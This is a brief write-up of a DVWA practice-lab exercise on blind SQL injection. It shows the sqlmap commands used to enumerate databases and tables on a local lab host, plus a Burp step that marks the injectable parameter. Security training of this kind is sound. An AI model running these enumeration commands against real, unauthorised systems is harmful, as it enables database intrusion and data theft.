DVWA Exercises 6

13 Blind SQL Injection

In contrast to more regular SQL injections, a blind SQL injection can usually only be used to get true/false results. Since exfiltrating values this way will take hundreds or even thousands of requests, automated tools are often used. Some write their own, but most people use sqlmap. Fortunately, it has already been installed for you and is ready for use.

Let's try sqlmap:

sqlmap --cookie='PHPSESSID=<your-session-id>' -u '<your-vulnerable-url>'

To find the session id cookie we can type document.cookie in the console:

First I've tried to go ahead with the following parameters:

sqlmap -u "http://172.17.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=37dpblqjrhknhc5pi08k916g21; security=low" --data="id=1&Submit=Submit" -p "id" --dbs --level=5 --risk=3

I didn't had success with this one. For some reasons it said the parameter id is not injectable!

Let's start burp and catching the get request when submitting a ID.

In burp I'll modify the get request, set the parameter ?id=1 to ?id=1* and save the whole request to a file.

sqlmap -r blind_sql --threads=10 -f --dbs --tables

PreviousDVWA Exercises 5 NextDVWA Exercises 7

Last updated 2 years ago